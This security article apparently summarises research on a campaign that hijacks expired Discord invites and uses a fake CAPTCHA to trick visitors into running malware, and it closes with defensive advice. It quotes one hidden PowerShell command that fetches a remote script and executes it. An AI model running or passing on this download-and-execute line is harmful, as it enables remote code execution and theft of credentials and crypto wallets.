A Discord invite you embedded in a blog post, social‑media thread, or product FAQ last year may no longer point to the community you intended. Because Discord allows boosted servers to re‑claim expired or deleted vanity codes, threat actors exploit hijacked abandoned Discord invites, attaching them to their own servers, and funnelling visitors into a slick, but malicious, “verification” flow.
Check Point Research revealed the campaign in June 2025, observing it deliver AsyncRAT and a customised Skuld Stealer that targets browser cookies and crypto‑wallet seed phrases. Every hop – Discord, GitHub, Bitbucket, Pastebin – uses a trusted cloud service, giving the traffic a clean bill of health at most network edges.
What’s new & why it matters
Invite‑code reuse loophole
Boosted servers can register any unused code, including one that previously belonged to another community, as a custom vanity URL.
Dormant links weaponised
Old tweets, forum posts, or landing pages that still point to discord.gg/<code> now act as malware distribution channels.
Cloud‑native evasion
Every payload stage sits on Discord, Pastebin, GitHub, or Bitbucket, making the traffic look legitimate.
Victim profile
The lure targets gamers, crypto traders, and developer communities with high search‑engine visibility.
Step‑by‑step attack flow
-
Invite hijack
Attackers monitor expiring Discord codes and register them as vanity URLs. A Reddit thread that once linked to a popular modding server now redirects to the attacker’s server.
-
Fake verification page (ClickFix)
The server shows only a locked #verify channel. A bot button opens captchaguard[.]me, which silently copies a PowerShell one‑liner to the clipboard and claims the CAPTCHA failed—”paste this command into Run to continue“.
powershell -nop -w hidden -c “iwr -UseBasicParsing https://pastebin.com/raw/abcd1234 | iex”
-
PowerShell loader
The one‑liner fetches an unobfuscated script from Pastebin that downloads installer.exe from GitHub and sleeps for 15 minutes to evade sandboxes.
-
Staged payload chain
installer.exe drops a VBScript (runsys.vbs) and schedules it to run every five minutes. The script XOR‑decrypts blobs from a Bitbucket repo, finally launching AsyncRAT and a stripped‑down Skuld Stealer.
-
Exfiltration & persistence
Stolen cookies, tokens, and wallet seeds are zipped and sent to a Discord webhook. A scheduled task (checker) re‑downloads the payload if removed.
Impact on brands & communities
- Brand trust erosion: Users quickly lose faith in communities whose invites suddenly lead to malware.
- SEO poisoning: High‑ranking pages that embed hijacked invites funnel traffic to malicious servers, indirectly harming site authority.
- Wallet & PII theft: Skuld Stealer targets Chromium cookies and Exodus/Atomic wallet data; AsyncRAT gives attackers full remote control.
How to protect your links
For Discord server owners & community managers
- Run a site audit: site:yourdomain.com discord.gg to surface old links.
- Replace or redirect outdated invites and add a banner on legacy posts with the new code.
- Disable vanity URLs if you can’t maintain Level‑3 boosts.
For end‑users
- Treat any request to paste a command from your clipboard as a red flag.
- Use hardware 2FA keys and separate browser profiles for high‑value crypto tasks.
Final Thoughts
Hijacked Discord invites transform once‑trusted community links into high‑credibility malware conduits. Auditing published content, regenerating permanent invites, and training users to spot clipboard‑based scams can collapse the entire attack chain with minimal effort. Stay vigilant to stay safe!
